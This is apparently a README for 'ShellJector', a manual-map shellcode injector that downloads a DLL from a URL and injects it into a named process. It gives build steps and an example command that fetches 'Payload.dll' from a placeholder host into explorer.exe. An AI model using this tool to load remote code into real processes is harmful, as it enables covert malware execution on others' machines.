Manual map shellcode (aka byte array) injector wich can download DLL from the internet by URL
Also take a look at local version!
- Open 
ShellJector.sln -> main.cpp; - Set 
ProcNameandDllURL; - Build;
 
- Go to \ShellJector\Build;
- OR just download the Latest Release;
 - Set launch arguments (down below);
 
 - Open Target Process;
 - Open 
ShellJector.exe; 
You can set ProcName and DllURL with -proc and -url arguments
(ex: ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll")
Arguments are case sensitive!